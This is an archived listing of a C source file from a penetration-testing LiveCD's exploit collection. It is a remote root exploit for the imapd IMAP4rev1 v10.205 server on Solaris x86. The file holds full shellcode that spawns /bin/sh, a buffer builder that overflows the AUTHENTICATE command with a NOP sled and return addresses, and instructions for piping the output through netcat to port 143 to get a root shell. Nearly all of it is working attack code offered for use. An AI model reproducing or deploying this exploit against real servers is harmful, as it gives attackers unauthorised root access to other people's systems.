home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / solx86-imapd.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  3KB  |  93 lines
  1. /*
  2.    imapd IMAP4rev1 v10.205 remote root exploit, solaris x86 (not SPARC yet)
  3.    exploits the AUTHENTICATE overflow, yielding a remote root shell
  4.    
  5.    shellcode is obviously modified to avoid problems with toupper()
  6.    by anathema <anathema@hack.co.za>
  7.  */
  8. /*
  9.    Compilation:
  10.      $ gcc imapd.c -o imapd
  11.    Requires netcat for usage:
  12.      $ (./imapd [offset]; cat) | nc host 143
  13.  */
  14.  
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <unistd.h>
  18.  
  19. #define RET        1028
  20. #define ADDR        0x08047148
  21.  
  22. char c0de[] =
  23.   /* main: */
  24.   "\xeb\x33"               /* jmp callz */
  25.   /* start: */
  26.   "\x5e"                   /* popl %esi */
  27.   "\x8d\x06"               /* leal (%esi), %eax */
  28.   "\x29\xc9"               /* subl %ecx, %ecx */
  29.   "\x89\xf3"               /* movl %esi, %ebx */
  30.   "\x89\x5e\x08"           /* movl %ebx, 0x08(%esi) */
  31.   "\xb1\x07"               /* movb $0x07, %cl */
  32.   /* loopz: */
  33.   /*
  34.      Go through a loop, incrementing the `/bin/sh -= 0x20` string
  35.      by 0x20, yielding /bin/sh for execve(). Why do other exploits 
  36.      increment each char individually? Using the loop instruction is
  37.      far more efficient..  -a
  38.    */
  39.   "\x80\x03\x20"           /* addb $0x20, (%ebx) */
  40.   "\x43"                   /* incl %ebx */
  41.   "\xe0\xfa"               /* loopne loopz */
  42.   "\x93"                   /* xchgl %eax, %ebx */
  43.   "\x29\xc0"               /* subl %eax, %eax */
  44.   "\x89\x5e\x0b"           /* movl %ebx, 0x0b(%esi) */
  45.   "\x29\xd2"               /* subl %edx, %edx */
  46.   "\x88\x56\x19"           /* movb %dl, 0x19(%esi) */
  47.   "\x89\x56\x07"           /* movl %edx, 0x07(%esi) */
  48.   "\x89\x56\x0f"           /* movl %edx, 0x0f(%esi) */
  49.   "\x89\x56\x14"           /* movl %edx, 0x14(%esi) */
  50.   "\xb0\x3b"               /* movb $0x3b, %al */
  51.   "\x8d\x4e\x0b"           /* leal 0x0b(%esi), %ecx */
  52.   "\x89\xca"               /* movl %ecx, %edx */
  53.   "\x52"                   /* pushl %edx */
  54.   "\x51"                   /* pushl %ecx */
  55.   "\x53"                   /* pushl %ebx */
  56.   "\x50"                   /* pushl %eax */
  57.   "\xeb\x18"               /* jmp lcall */
  58.   /* callz: */
  59.   "\xe8\xc8\xff\xff\xff"   /* call start */
  60.   "\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
  61.   "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
  62.   /* lcall: */
  63.   "\x9a\x04\x04\x04\x04\x07\x04";
  64.  
  65. int
  66. main (int argc, char **argv)
  67. {
  68.   u_char buf[4096]   = {0};
  69.   u_long addr        = ADDR;
  70.   int ret = RET, i = 0, j = 0;
  71.  
  72.   if (argc > 1) addr += atoi(argv[1]);
  73.   fprintf(stderr, "addr 0x%lx\n", addr);
  74.  
  75.   memset(buf, 0x90, ret);
  76.   memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));
  77.   for (i = ret; i < ret + 28; i++)
  78.     {
  79.       buf[i+0] = (addr & 0xff);
  80.       buf[i+1] = (addr >> 8) & 0xff;
  81.       buf[i+2] = (addr >> 16) & 0xff;
  82.       buf[i+3] = (addr >> 24) & 0xff;
  83.     }
  84.  
  85.   printf("* AUTHENTICATE {%d}\r\n", strlen(buf));
  86.   printf("%s\n", buf);
  87.  
  88.   sleep(1);
  89.   printf("\nuname -a; id;\n");
  90. }
  91.  
  92.  
  93. /*                    www.hack.co.za              [2000]*/